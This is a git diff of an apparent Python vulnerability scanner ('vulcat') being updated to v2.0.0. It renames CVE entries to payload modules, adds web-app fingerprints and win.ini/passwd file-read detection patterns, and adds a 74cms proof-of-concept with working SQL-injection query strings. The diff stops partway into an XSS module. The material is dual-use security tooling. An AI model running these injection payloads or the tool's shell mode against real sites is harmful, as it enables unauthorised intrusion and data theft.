'wooyun-2010-080723', - 'type': 'RCE', + 'payload': 'discuz-wooyun-2010-080723-rce', 'shell': 'Y', 'description': list_lang['Discuz']['wooyun-2010-080723'] } ], 'Django': [ { - 'vul_id': 'CVE-2017-12794', - 'type': 'XSS', + 'payload': 'django-cve-2017-12794-xss', 'shell': '-', 'description': list_lang['Django']['CVE-2017-12794'] }, { - 'vul_id': 'CVE-2018-14574', - 'type': 'Redirect', + 'payload': 'django-cve-2018-14574-redirect', 'shell': '-', 'description': list_lang['Django']['CVE-2018-14574'] }, { - 'vul_id': 'CVE-2019-14234', - 'type': 'SQLinject', + 'payload': 'django-cve-2019-14234-sqlinject', 'shell': '-', 'description': list_lang['Django']['CVE-2019-14234'] }, { - 'vul_id': 'CVE-2020-9402', - 'type': 'SQLinject', + 'payload': 'django-cve-2020-9402-sqlinject', 'shell': '-', 'description': list_lang['Django']['CVE-2020-9402'] }, { - 'vul_id': 'CVE-2021-35042', - 'type': 'SQLinject', + 'payload': 'django-cve-2021-35042-sqlinject', 'shell': '-', 'description': list_lang['Django']['CVE-2021-35042'] } ], 'Drupal': [ { - 'vul_id': 'CVE-2014-3704', - 'type': 'SQLinject', + 'payload': 'drupal-cve-2014-3704-sqlinject', 'shell': '-', 'description': list_lang['Drupal']['CVE-2014-3704'] }, { - 'vul_id': 'CVE-2017-6920', - 'type': 'RCE', + 'payload': 'drupal-cve-2017-6920-rce', 'shell': '-', 'description': list_lang['Drupal']['CVE-2017-6920'] }, { - 'vul_id': 'CVE-2018-7600', - 'type': 'RCE', + 'payload': 'drupal-cve-2018-7600-rce', 'shell': 'Y', 'description': list_lang['Drupal']['CVE-2018-7600'] }, { - 'vul_id': 'CVE-2018-7602', - 'type': 'RCE', + 'payload': 'drupal-cve-2018-7602-rce', 'shell': '-', 'description': list_lang['Drupal']['CVE-2018-7602'] } ], 'ElasticSearch': [ { - 'vul_id': 'CVE-2014-3120', - 'type': 'RCE', + 'payload': 'elasticsearch-cve-2014-3120-rce', 'shell': 'Y', 'description': list_lang['ElasticSearch']['CVE-2014-3120'] }, { - 'vul_id': 'CVE-2015-1427', - 'type': 'RCE', + 'payload': 'elasticsearch-cve-2015-1427-rce', 'shell': 'Y', 'description': list_lang['ElasticSearch']['CVE-2015-1427'] }, { - 'vul_id': 'CVE-2015-3337', - 'type': 'FileRead', + 'payload': 'elasticsearch-cve-2015-3337-fileread', 'shell': 'Y', 'description': list_lang['ElasticSearch']['CVE-2015-3337'] }, { - 'vul_id': 'CVE-2015-5531', - 'type': 'FileRead', + 'payload': 'elasticsearch-cve-2015-5531-fileread', 'shell': 'Y', 'description': list_lang['ElasticSearch']['CVE-2015-5531'] }, ], 'F5 BIG-IP': [ { - 'vul_id': 'CVE-2020-5902', - 'type': 'RCE', + 'payload': 'f5bigip-cve-2020-5902-rce-fileread', 'shell': '-', 'description': list_lang['F5 BIG-IP']['CVE-2020-5902'] }, { - 'vul_id': 'CVE-2022-1388', - 'type': 'unAuth/RCE', + 'payload': 'f5bigip-cve-2022-1388-unauth-rce', 'shell': 'Y', - 'description': list_lang['F5 BIG-IP']['CVE-2020-5902'] + 'description': list_lang['F5 BIG-IP']['CVE-2022-1388'] } ], 'Fastjson': [ { - 'vul_id': 'CNVD-2017-02833', - 'type': 'unSerialize', + 'payload': 'fastjson-cnvd-2017-02833-rce', 'shell': 'Y', 'description': list_lang['Fastjson']['CNVD-2017-02833'] }, { - 'vul_id': 'CNVD-2019-22238', - 'type': 'unSerialize', + 'payload': 'fastjson-cnvd-2019-22238-rce', 'shell': 'Y', 'description': list_lang['Fastjson']['CNVD-2019-22238'] }, { - 'vul_id': 'rce-1-2-62', - 'type': 'unSerialize', + 'payload': 'fastjson-v1.2.62-rce', 'shell': 'Y', 'description': list_lang['Fastjson']['rce-1-2-62'] }, { - 'vul_id': 'rce-1-2-66', - 'type': 'unSerialize', + 'payload': 'fastjson-v1.2.66-rce', 'shell': 'Y', 'description': list_lang['Fastjson']['rce-1-2-66'] } ], 'Gitea': [ { - 'vul_id': '(None)', - 'type': 'unAuth', + 'payload': 'gitea-unauth-fileread-rce', 'shell': '-', 'description': list_lang['Gitea'] }, ], 'Gitlab': [ { - 'vul_id': 'CVE-2021-22205', - 'type': 'RCE', + 'payload': 'gitlab-cve-2021-22205-rce.py', 'shell': '-', 'description': list_lang['Gitlab']['CVE-2021-22205'] }, { - 'vul_id': 'CVE-2021-22214', - 'type': 'SSRF', + 'payload': 'gitlab-cve-2021-22214-ssrf', 'shell': 'Y', 'description': list_lang['Gitlab']['CVE-2021-22214'] } ], 'GoCD': [ { - 'vul_id': 'CVE-2021-43287', - 'type': 'FileRead', + 'payload': 'gocd-cve-2021-43287-fileread', 'shell': 'Y', 'description': list_lang['GoCD']['CVE-2021-43287'] }, ], 'Grafana': [ { - 'vul_id': 'CVE-2021-43798', - 'type': 'FileRead', + 'payload': 'grafana-cve-2021-43798-fileread', 'shell': 'Y', 'description': list_lang['Grafana']['CVE-2021-43798'] }, ], 'Influxdb': [ { - 'vul_id': '(None)', - 'type': 'unAuth', + 'payload': 'influxdb-unauth', 'shell': '-', 'description': list_lang['Influxdb'] }, ], 'JBoss': [ { - 'vul_id': '(None)', - 'type': 'unAuth', + 'payload': 'jboss-unauth', 'shell': '-', 'description': list_lang['JBoss']['unAuth'] } ], 'Jenkins': [ { - 'vul_id': 'CVE-2018-1000861', - 'type': 'RCE', + 'payload': 'jenkins-cve-2018-1000861-rce', 'shell': 'Y', 'description': list_lang['Jenkins']['CVE-2018-1000861'] }, { - 'vul_id': '(None)', - 'type': 'unAuth', + 'payload': 'jenkins-unauth', 'shell': 'Y', 'description': list_lang['Jenkins']['unAuth'] }, ], 'Jetty': [ { - 'vul_id': 'CVE-2021-28164', - 'type': 'DSinfo', + 'payload': 'jetty-cve-2021-28164-dsinfo', 'shell': '-', 'description': list_lang['Jetty']['CVE-2021-28164'] }, { - 'vul_id': 'CVE-2021-28169', - 'type': 'DSinfo', + 'payload': 'jetty-cve-2021-28169-dsinfo', 'shell': '-', 'description': list_lang['Jetty']['CVE-2021-28169'] }, { - 'vul_id': 'CVE-2021-34429', - 'type': 'DSinfo', + 'payload': 'jetty-cve-2021-34429-dsinfo', 'shell': '-', 'description': list_lang['Jetty']['CVE-2021-34429'] } ], 'Joomla': [ { - 'vul_id': 'CVE-2017-8917', - 'type': 'SQLinject', + 'payload': 'joomla-cve-2017-8917-sqlinject', 'shell': '-', 'description': list_lang['Joomla']['CVE-2017-8917'] }, { - 'vul_id': 'CVE-2023-23752', - 'type': 'unAuth', + 'payload': 'joomla-cve-2023-23752-unauth', 'shell': '-', 'description': list_lang['Joomla']['CVE-2023-23752'] }, ], 'Jupyter': [ { - 'vul_id': '(None)', - 'type': 'unAuth', + 'payload': 'jupyter-unauth', 'shell': '-', 'description': list_lang['Jupyter'] } ], 'Keycloak': [ { - 'vul_id': 'CVE-2020-10770', - 'type': 'SSRF', + 'payload': 'keycloak-cve-2020-10770-ssrf', 'shell': '-', 'description': list_lang['Keycloak']['CVE-2020-10770'] } ], # 'Kindeditor': [ # { - # 'vul_id': 'CVE-2018-18950', + # 'payload': '', # 'type': 'FileRead', # 'method': 'GET', # 'description': list_lang[''][''] @@ -484,332 +439,295 @@ def list(): # ], 'Landray': [ { - 'vul_id': 'CNVD-2021-28277', - 'type': 'FileRead/SSRF', + 'payload': 'landray-oa-cnvd-2021-28277-ssrf-fileread', 'shell': 'Y', 'description': list_lang['Landray']['CNVD-2021-28277'] } ], 'Mini Httpd': [ { - 'vul_id': 'CVE-2018-18778', - 'type': 'FileRead', + 'payload': 'minihttpd-cve-2018-18778-fileread', 'shell': '-', 'description': list_lang['Mini Httpd']['CVE-2018-18778'] } ], 'mongo-express': [ { - 'vul_id': 'CVE-2019-10758', - 'type': 'RCE', + 'payload': 'mongoexpress-cve-2019-10758-rce', 'shell': 'Y', 'description': list_lang['mongo-express']['CVE-2019-10758'] } ], 'Nexus Repository': [ { - 'vul_id': 'CVE-2019-5475', - 'type': 'RCE', + 'payload': 'nexus-cve-2019-5475-rce', 'shell': 'Y', 'description': list_lang['Nexus Repository']['CVE-2019-5475'] }, { - 'vul_id': 'CVE-2019-7238', - 'type': 'RCE', + 'payload': 'nexus-cve-2019-7238-rce', 'shell': 'Y', 'description': list_lang['Nexus Repository']['CVE-2019-7238'] }, { - 'vul_id': 'CVE-2019-15588', - 'type': 'RCE', + 'payload': 'nexus-cve-2019-15588-rce', 'shell': 'Y', 'description': list_lang['Nexus Repository']['CVE-2019-15588'] }, { - 'vul_id': 'CVE-2020-10199', - 'type': 'RCE', + 'payload': 'nexus-cve-2020-10199-rce', 'shell': 'Y', 'description': list_lang['Nexus Repository']['CVE-2020-10199'] }, { - 'vul_id': 'CVE-2020-10204', - 'type': 'RCE', + 'payload': 'nexus-cve-2020-10204-rce', 'shell': 'Y', 'description': list_lang['Nexus Repository']['CVE-2020-10204'] } ], 'Nodejs': [ { - 'vul_id': 'CVE-2017-14849', - 'type': 'FileRead', + 'payload': 'nodejs-cve-2017-14849-fileread', 'shell': 'Y', 'description': list_lang['Nodejs']['CVE-2017-14849'] }, { - 'vul_id': 'CVE-2021-21315', - 'type': 'RCE', + 'payload': 'nodejs-cve-2021-21315-rce', 'shell': 'Y', 'description': list_lang['Nodejs']['CVE-2021-21315'] } ], 'NodeRED': [ { - 'vul_id': 'CVE-2021-3223', - 'type': 'FileRead', + 'payload': 'nodered-cve-2021-3223-fileread', 'shell': 'Y', 'description': list_lang['NodeRED']['CVE-2021-3223'] } ], 'phpMyadmin': [ { - 'vul_id': 'WooYun-2016-199433', - 'type': 'unSerialize', + 'payload': 'phpmyadmin-cve-2018-12613-fileinclude-fileread', 'shell': '-', 'description': list_lang['phpMyadmin']['WooYun-2016-199433'] }, { - 'vul_id': 'CVE-2018-12613', - 'type': 'FileInclude', + 'payload': 'phpmyadmin-wooyun-2016-199433-unserialize', 'shell': 'Y', 'description': list_lang['phpMyadmin']['CVE-2018-12613'] }, ], 'PHPUnit': [ { - 'vul_id': 'CVE-2017-9841', - 'type': 'RCE', + 'payload': 'phpunit-cve-2017-9841-rce', 'shell': 'Y', 'description': list_lang['PHPUnit']['CVE-2017-9841'] } ], 'Ruby on Rails': [ { - 'vul_id': 'CVE-2018-3760', - 'type': 'FileRead', + 'payload': 'ruby-on-rails-cve-2018-3760-fileread', 'shell': 'Y', 'description': list_lang['Ruby on Rails']['CVE-2018-3760'] }, { - 'vul_id': 'CVE-2019-5418', - 'type': 'FileRead', + 'payload': 'ruby-on-rails-cve-2019-5418-fileread', 'shell': 'Y', 'description': list_lang['Ruby on Rails']['CVE-2019-5418'] }, { - 'vul_id': 'CVE-2020-8163', - 'type': 'RCE', + 'payload': 'ruby-on-rails-cve-2020-8163-rce', 'shell': '-', 'description': list_lang['Ruby on Rails']['CVE-2020-8163'] } ], 'ShowDoc': [ { - 'vul_id': 'CNVD-2020-26585', - 'type': 'FileUpload', + 'payload': 'showdoc-cnvd-2020-26585-fileupload', 'shell': '-', 'description': list_lang['ShowDoc']['CNVD-2020-26585'] } ], 'Spring': [ { - 'vul_id': 'CVE-2016-4977', - 'type': 'RCE', + 'payload': 'spring-security-oauth-cve-2016-4977-rce', 'shell': '-', 'description': list_lang['Spring']['CVE-2016-4977'] }, { - 'vul_id': 'CVE-2017-8046', - 'type': 'RCE', + 'payload': 'spring-data-rest-cve-2017-8046-rce', 'shell': '-', 'description': list_lang['Spring']['CVE-2017-8046'] }, { - 'vul_id': 'CVE-2018-1273', - 'type': 'RCE', + 'payload': 'spring-data-commons-cve-2018-1273-rce', 'shell': 'Y', 'description': list_lang['Spring']['CVE-2018-1273'] }, { - 'vul_id': 'CVE-2020-5410', - 'type': 'FileRead', + 'payload': 'spring-cloud-config-cve-2020-5410-fileread', 'shell': 'Y', 'description': list_lang['Spring']['CVE-2020-5410'] }, { - 'vul_id': 'CVE-2021-21234', - 'type': 'FileRead', + 'payload': 'spring-boot-cve-2021-21234-fileread', 'shell': 'Y', 'description': list_lang['Spring']['CVE-2021-21234'] }, { - 'vul_id': 'CVE-2022-22947', - 'type': 'RCE', + 'payload': 'spring-cloud-gateway-cve-2022-22947-rce', 'shell': '-', 'description': list_lang['Spring']['CVE-2022-22947'] }, { - 'vul_id': 'CVE-2022-22963', - 'type': 'RCE', + 'payload': 'spring-cloud-function-cve-2022-22963-rce', 'shell': 'Y', 'description': list_lang['Spring']['CVE-2022-22963'] }, { - 'vul_id': 'CVE-2022-22965', - 'type': 'RCE', + 'payload': 'spring-cve-2022-22965-rce', 'shell': '-', 'description': list_lang['Spring']['CVE-2022-22965'] }, ], 'Supervisor': [ { - 'vul_id': 'CVE-2017-11610', - 'type': 'RCE', + 'payload': 'supervisor-cve-2017-11610-rce', 'shell': '-', 'description': list_lang['Supervisor']['CVE-2017-11610'] } ], 'ThinkPHP': [ { - 'vul_id': 'CVE-2018-1002015', - 'type': 'RCE', + 'payload': 'thinkphp-cve-2018-1002015-rce', 'shell': 'Y', 'description': list_lang['ThinkPHP']['CVE-2018-1002015'] }, { - 'vul_id': 'CNVD-2018-24942', - 'type': 'RCE', + 'payload': 'thinkphp-cnvd-2018-24942-rce', 'shell': 'Y', 'description': list_lang['ThinkPHP']['CNVD-2018-24942'] }, { - 'vul_id': 'CNNVD-201901-445', - 'type': 'RCE', + 'payload': 'thinkphp-cnnvd-201901-445-rce', 'shell': 'Y', 'description': list_lang['ThinkPHP']['CNNVD-201901-445'] }, { - 'vul_id': 'CNVD-2022-86535', - 'type': 'RCE', + 'payload': 'thinkphp-cnvd-2022-86535-rce', 'shell': '-', 'description': list_lang['ThinkPHP']['CNVD-2022-86535'] }, { - 'vul_id': 'rce-2-x', - 'type': 'RCE', + 'payload': 'thinkphp-2.x-rce', 'shell': '-', 'description': list_lang['ThinkPHP']['2.x RCE'] }, { - 'vul_id': 'ids-sqlinject-5', - 'type': 'SQLinject', + 'payload': 'thinkphp-5-ids-sqlinject', 'shell': '-', 'description': list_lang['ThinkPHP']['5 ids sqlinject'] } ], 'Ueditor': [ { - 'vul_id': '(None)', - 'type': 'SSRF', + 'payload': 'ueditor-ssrf', 'shell': '-', 'description': list_lang['Ueditor'] } ], 'uWSGI-PHP': [ { - 'vul_id': 'CVE-2018-7490', - 'type': 'FileRead', + 'payload': 'uwsgiphp-cve-2018-7490-fileread', 'shell': 'Y', 'description': list_lang['uWSGI-PHP'] } ], + 'VMware': [ + { + 'payload': 'vmware-vcenter-2020-10-fileread', + 'shell': 'Y', + 'description': list_lang['VMware']['2020-10-fileread'] + }, + { + 'payload': 'vmware-vcenter-cve-2021-21972-fileupload-rce', + 'shell': '-', + 'description': list_lang['VMware']['CVE-2021-21972'] + } + ], 'Oracle Weblogic': [ { - 'vul_id': 'CVE-2014-4210', - 'type': 'SSRF', + 'payload': 'oracle-weblogic-cve-2014-4210-ssrf', 'shell': '-', 'description': list_lang['Oracle Weblogic']['CVE-2014-4210'] }, { - 'vul_id': 'CVE-2017-10271', - 'type': 'unSerialize', + 'payload': 'oracle-weblogic-cve-2017-10271-unserialize', 'shell': '-', 'description': list_lang['Oracle Weblogic']['CVE-2017-10271'] }, { - 'vul_id': 'CVE-2019-2725', - 'type': 'unSerialize', + 'payload': 'oracle-weblogic-cve-2019-2725-unserialize', 'shell': '-', 'description': list_lang['Oracle Weblogic']['CVE-2019-2725'] }, { - 'vul_id': 'CVE-2020-14750', - 'type': 'unAuth', + 'payload': 'oracle-weblogic-cve-2020-14750-bypass', 'shell': '-', 'description': list_lang['Oracle Weblogic']['CVE-2020-14750'] }, { - 'vul_id': 'CVE-2020-14882', - 'type': 'RCE', + 'payload': 'oracle-weblogic-cve-2020-14882-rce-unauth', 'shell': 'Y', 'description': list_lang['Oracle Weblogic']['CVE-2020-14882'] }, { - 'vul_id': 'CVE-2021-2109', - 'type': 'RCE', + 'payload': 'oracle-weblogic-cve-2021-2109-rce', 'shell': '-', 'description': list_lang['Oracle Weblogic']['CVE-2021-2109'] } ], 'Webmin': [ { - 'vul_id': 'CVE-2019-15107', - 'type': 'RCE', + 'payload': 'webmin-cve-2019-15107-rce', 'shell': 'Y', 'description': list_lang['Webmin']['CVE-2019-15107'] }, { - 'vul_id': 'CVE-2019-15642', - 'type': 'RCE', + 'payload': 'webmin-cve-2019-15642-rce', 'shell': 'Y', 'description': list_lang['Webmin']['CVE-2019-15642'] } ], 'Yonyou': [ { - 'vul_id': 'CNNVD-201610-923', - 'type': 'SQLinject', + 'payload': 'yonyou-grp-u8-cnnvd-201610-923-sqlinject', 'shell': '-', 'description': list_lang['Yonyou']['CNNVD-201610-923'] }, { - 'vul_id': 'CNVD-2021-30167', - 'type': 'RCE', + 'payload': 'yonyou-nc-cnvd-2021-30167-rce', 'shell': 'Y', 'description': list_lang['Yonyou']['CNVD-2021-30167'] }, { - 'vul_id': 'nc-fileread', - 'type': 'FileRead', + 'payload': 'yonyou-erp-nc-ncfindweb-fileread', 'shell': '-', 'description': list_lang['Yonyou']['NCFindWeb'] }, { - 'vul_id': 'u8-oa-getsession', - 'type': 'DSinfo', + 'payload': 'yonyou-u8-oa-getsession-dsinfo', 'shell': '-', 'description': list_lang['Yonyou']['getSessionList.jsp'] }, { - 'vul_id': 'u8-oa-test-sql', - 'type': 'SQLinject', + 'payload': 'yonyou-u8-oa-test.jsp-sqlinject', 'shell': '-', 'description': list_lang['Yonyou']['test.jsp'] } ], 'Zabbix': [ { - 'vul_id': 'CVE-2016-10134', - 'type': 'SQLinject', + 'payload': 'zabbix-cve-2016-10134-sqlinject', 'shell': '-', 'description': list_lang['Zabbix']['CVE-2016-10134'] } diff --git a/lib/initial/parse.py b/lib/initial/parse.py index 1893b1b..5597e29 100644 --- a/lib/initial/parse.py +++ b/lib/initial/parse.py @@ -14,12 +14,13 @@ def parse(): parser = OptionParser('\n' + lang['disclaimer'] + '''Usage: python3 vulcat.py Examples: -python3 vulcat.py -u https://www.example.com/ -python3 vulcat.py -u https://www.example.com/ -a thinkphp --log 3 -python3 vulcat.py -u https://www.example.com/ -a tomcat -v CVE-2017-12615 -python3 vulcat.py -f url.txt -t 10 -o html +python3 vulcat.py -h python3 vulcat.py --list -''', version='vulcat.py-1.2.0\n') +python3 vulcat.py -u https://www.example.com/ +python3 vulcat.py -f url.txt -o html +python3 vulcat.py -u https://www.example.com/ -v httpd --log 3 +python3 vulcat.py -u https://www.example.com/ -v cnvd-2018-24942 --shell +''', version='vulcat.py-v2.0.0\n') # * 指定目标 target = parser.add_option_group(lang['target_help']['title'], lang['target_help']['name']) target.add_option('-u', '--url', type='string', dest='url', default=None, help=lang['target_help']['url']) @@ -29,7 +30,7 @@ def parse(): # * 可选参数 optional = parser.add_option_group(lang['optional_help']['title'], lang['optional_help']['name']) optional.add_option('-t', '--thread', type='int', dest='thread', default=3, help=lang['optional_help']['thread']) - optional.add_option('--delay', type='float', dest='delay', default=1, help=lang['optional_help']['delay']) + optional.add_option('--delay', type='float', dest='delay', default=0.7, help=lang['optional_help']['delay']) optional.add_option('--timeout', type='float', dest='timeout', default=10, help=lang['optional_help']['timeout']) optional.add_option('--user-agent', type='string', dest='ua', default=None, help=lang['optional_help']['user_agent']) optional.add_option('--cookie', type='string', dest='cookie', default=None, help=lang['optional_help']['cookie']) @@ -48,7 +49,7 @@ def parse(): # * 指定目标类型 application = parser.add_option_group(lang['application_help']['title'], lang['application_help']['name']) - application.add_option('-a', '--application', type='string', dest='application', default='auto', help=lang['application_help']['application']) + # application.add_option('-a', '--application', type='string', dest='application', default='auto', help=lang['application_help']['application']) application.add_option('-v', '--vuln', type='string', dest='vuln', default=None, help=lang['application_help']['vuln']) application.add_option('--shell', dest='shell', action='store_true', help=lang['application_help']['shell']) application.add_option('--type', type='string', dest='vulnType', default=None, help=lang['application_help']['type']) @@ -72,6 +73,6 @@ def parse(): lists = parser.add_option_group(lang['lists_help']['title'], lang['lists_help']['name']) lists.add_option('--list', dest='list', help=lang['lists_help']['list'], action='store_true') - app_list = parser.add_option_group(lang['app_list_help']['title'], lang['app_list_help']['name']) + # app_list = parser.add_option_group(lang['app_list_help']['title'], lang['app_list_help']['name']) return parser.parse_args() \ No newline at end of file diff --git a/lib/plugins/fingerprint/webapp.py b/lib/plugins/fingerprint/webapp.py index 177f655..c38ec1b 100644 --- a/lib/plugins/fingerprint/webapp.py +++ b/lib/plugins/fingerprint/webapp.py @@ -93,9 +93,9 @@ def identify(self, client): return dedup_app_list logger.info('yellow_ex', self.lang['core']['web_finger']['NotFind']) - return None + return [] except: - return None + return [] def __init__(self): self.delay = config.get('delay') @@ -103,6 +103,20 @@ def __init__(self): # * webapp指纹库 self.webapp_fingerprint = [ + { + 'name': '74cms', + 'path': '', + 'data': '', + 'fingerprint': [ + r'骑士PHP高端人才系统(www\.74cms\.com)', + r'', + r'', + r'', + r'', + r'欢迎登录骑士人才系统!请.{10,70}登录.{10,70}或.{10,70}免费注册', + r'', + ] + }, { 'name': 'nacos', 'path': 'nacos/', @@ -192,6 +206,15 @@ def __init__(self): r'Apache2 package with Debian\. However, check.*existing bug reports' ] }, + { + 'name': 'httpd', + 'path': 'qwe', + 'data': '', + 'fingerprint': [ + r'404 Not Found.*

Not Found

.*

The requested URL /qwe was not found on this server\.

', + r'
Apache/.{1,30} Server at .{1,30} Port \d{0,6}
', + ] + }, { 'name': 'skywalking', 'path': '', @@ -429,11 +452,20 @@ def __init__(self): 'data': '', 'fingerprint': [ r'Welcome to JBoss™', + r'Welcome to JBoss AS', r'', r'.*', + r'.*', r'

JBoss Online Resources

.*

JBoss Management

', r'
  • JBoss Web Console
    • ', r'
    JBoss™ Application Server
    ', + r'
  • JBoss Web Services Console
    • ', + r'JBoss Application Server', + r'
  • JBoss AS Documentation
    • ', + r'
  • JBoss Wiki
    • ', + r'
  • JBoss AS JIRA
    • ', + r'
  • JBoss Forums
    • ', + r'
  • JBoss Mailing Lists
    • ', ] }, { @@ -634,7 +666,15 @@ def __init__(self): r'十年磨一剑 - 为API开发设计的高性能框架', r':\)', r'ThinkPHP.*V.*', - r'\d{0,3}载初心不改 - 你值得信赖的PHP框架' + r'\d{0,3}载初心不改 - 你值得信赖的PHP框架', + r' { Fast & Simple OOP PHP Framework } -- \[ WE CAN DO IT JUST THINK \]

    ', + r'/app/ThinkPHP/Library/Think/App\.class\.php\(', + r'/app/ThinkPHP/ThinkPHP\.php\(', + r'Think\\App::exec\(\)', + r'Think\\App::run\(\)', + r'Think\\Think::start\(\)', + r"require\('/app/ThinkPHP/T\.\.\.'\)", + r'

    ThinkPHP', ] }, { @@ -646,7 +686,15 @@ def __init__(self): r'十年磨一剑 - 为API开发设计的高性能框架', r':\)', r'ThinkPHP.*V.*', - r'\d{0,3}载初心不改 - 你值得信赖的PHP框架' + r'\d{0,3}载初心不改 - 你值得信赖的PHP框架', + r' { Fast & Simple OOP PHP Framework } -- \[ WE CAN DO IT JUST THINK \]

    ', + r'/app/ThinkPHP/Library/Think/App\.class\.php\(', + r'/app/ThinkPHP/ThinkPHP\.php\(', + r'Think\\App::exec\(\)', + r'Think\\App::run\(\)', + r'Think\\Think::start\(\)', + r"require\('/app/ThinkPHP/T\.\.\.'\)", + r'

    ThinkPHP', ] }, { @@ -671,6 +719,18 @@ def __init__(self): r'' ] }, + { + 'name': 'vmware', + 'path': '', + 'data': '', + 'fingerprint': [ + r'VMware vSphere 6', + r'

    ', + r'

    ', + ] + }, { 'name': 'weblogic', 'path': '', diff --git a/lib/plugins/shell.py b/lib/plugins/shell.py index b74942e..304b92c 100644 --- a/lib/plugins/shell.py +++ b/lib/plugins/shell.py @@ -57,6 +57,10 @@ def __init__(self): 'System32(\\|%5c|%5C)?'\ 'drivers(\\|%5c|%5C)?'\ 'etc(\\|%5c|%5C)?hosts', + r'C:(/|%2f|%2F)?'\ + 'Windows(/|%2f|%2F)?win.ini', + r'C:(\\|%5c|%5C)?'\ + 'Windows(\\|%5c|%5C)?win.ini', ] self.ssrf_old_payload_re_list = [ diff --git a/lib/tool/check.py b/lib/tool/check.py index 6ca1c31..6f782f4 100644 --- a/lib/tool/check.py +++ b/lib/tool/check.py @@ -4,10 +4,11 @@ ''' 检查 无法连接至目标url - 连接目标url超时 + 连接目标url超时 检查poc误报 例如直接输出payload在页面中的情况 参考: https://github.com/zhzyker/vulmap/blob/main/core/verify.py + 检查文件读取漏洞 ''' from lib.initial.config import config @@ -46,26 +47,29 @@ def check_res(resText, md, command='echo'): def check_res_fileread(resText, resHeaders=None): ''' 检查回显, 判断是否存在 FileRead(任意文件读取) 漏洞 - :param resText: 响应文本Response.text - :param resHeaders(可选参数): 响应头, 有时候回显可能在 响应Headers 里 而不在 响应Body 里 - + :param resText: 要检测的响应内容 + :param resHeaders(可选参数): 要检测的响应头 + * /etc/passwd r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root' * C:/Windows/System32/drivers/etc/hosts 'Microsoft Corp' and 'Microsoft TCP/IP for Windows' + * C:/Windows/win.ini + '; for 16-bit app support ''' - if ( + if ( # * 检查响应Body re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', resText, re.I|re.M|re.S) - or (('Microsoft Corp' in resText) - and ('Microsoft TCP/IP for Windows' in resText)) + or (('Microsoft Corp' in resText) and ('Microsoft TCP/IP for Windows' in resText)) + or ('; for 16-bit app support' in resText) ): - return True # * 文件回显在 响应Body里, 存在FileRead漏洞 - elif ( + return True + + elif ( # * 检查响应Headers re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', str(resHeaders), re.I|re.M|re.S) - or (('Microsoft Corp' in str(resHeaders)) - and ('Microsoft TCP/IP for Windows' in str(resHeaders))) + or (('Microsoft Corp' in str(resHeaders)) and ('Microsoft TCP/IP for Windows' in str(resHeaders))) + or ('; for 16-bit app support' in str(resHeaders)) ): - return True # * 文件回显在 响应Headers里, 存在FileRead漏洞 - + return True + return False # * 没有找到文件回显, 不存在FileRead漏洞 diff --git a/lib/tool/color.py b/lib/tool/color.py index ea36260..c8a80ea 100644 --- a/lib/tool/color.py +++ b/lib/tool/color.py @@ -5,37 +5,37 @@ init() # * 初始化, 使Windows机器也能正常显示颜色 -def reset(s): +def reset(s = ''): return Fore.RESET + s -def red(s): # * 红色 +def red(s = ''): # * 红色 return Fore.RED + s -def green(s): # * 绿色 +def green(s = ''): # * 绿色 return Fore.GREEN + s -def cyan(s): # * 青蓝 +def cyan(s = ''): # * 青蓝 return Fore.CYAN + s -def black_ex(s): # * 黑色(高亮) +def black_ex(s = ''): # * 黑色(高亮) return Fore.LIGHTBLACK_EX + s -def red_ex(s): # * 红色(高亮) +def red_ex(s = ''): # * 红色(高亮) return Fore.LIGHTRED_EX + s -def green_ex(s): # * 绿色(高亮) +def green_ex(s = ''): # * 绿色(高亮) return Fore.LIGHTGREEN_EX + s -def yellow_ex(s): # * 黄色(高亮) +def yellow_ex(s = ''): # * 黄色(高亮) return Fore.LIGHTYELLOW_EX + s -def blue_ex(s): # * 蓝色(高亮) +def blue_ex(s = ''): # * 蓝色(高亮) return Fore.LIGHTBLUE_EX + s -def magenta_ex(s): # * 紫色(高亮) +def magenta_ex(s = ''): # * 紫色(高亮) return Fore.LIGHTMAGENTA_EX + s -def cyan_ex(s): # * 青蓝(高亮) +def cyan_ex(s = ''): # * 青蓝(高亮) return Fore.LIGHTCYAN_EX + s diff --git a/payloads/74cms/74cms-v5.0.1-sqlinject.py b/payloads/74cms/74cms-v5.0.1-sqlinject.py new file mode 100644 index 0000000..468efa6 --- /dev/null +++ b/payloads/74cms/74cms-v5.0.1-sqlinject.py @@ -0,0 +1,59 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +74cms 5.0.1 前台AjaxPersonalController.class.php存在SQL注入 + 暂无编号 + Payload: https://github.com/chaitin/xray/blob/master/pocs/74cms-sqli.yml +''' + +from PluginManager import Vuln_Scan +from lib.tool.md5 import md5, random_int_1 + +class Scan(Vuln_Scan): + def __init__(self): + self.payloads = [ + {'path': 'index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and extractvalue(1,concat(0x7e,md5({RANNUM}))) -- a'}, + {'path': 'upload/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and extractvalue(1,concat(0x7e,md5({RANNUM}))) -- a'}, + ] + + def POC(self, clients): + client = clients.get('reqClient') + + vul_info = { + 'app_name': '74cms', + 'vul_type': 'SQLinject', + 'vul_id': '74cms-v5.0.1-sqlinject', + } + + for payload in self.payloads: + randomNum = random_int_1(6) # * 随机6位数字 + + path = payload['path'].format(RANNUM=randomNum) + + res = client.request( + 'get', + path, + allow_redirects=False, + vul_info=vul_info + ) + if res is None: + continue + + md = md5(str(randomNum), 31) # * 计算随机数字的md5值, 取31位(0-30) + + if (md in res.text): + results = { + 'Target': res.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + return None + + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) + \ No newline at end of file diff --git a/payloads/74cms/74cms-v6.0.4-xss.py b/payloads/74cms/74cms-v6.0.4-xss.py new file mode 100644 index 0000000..cd8ccbc --- /dev/null +++ b/payloads/74cms/74cms-v6.0.4-xss.py @@ -0,0 +1,58 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +74CMS-v6.0.4版本 帮助中心搜索框处存在XSS + 暂无编号 + Payload: https://www.freebuf.com/vuls/284537.html +''' + +from PluginManager import Vuln_Scan +from lib.tool.md5 import random_int_1 + +randomNum = random_int_1(6) + +class Scan(Vuln_Scan): + def __init__(self): + self.payloads = [ + {'path': 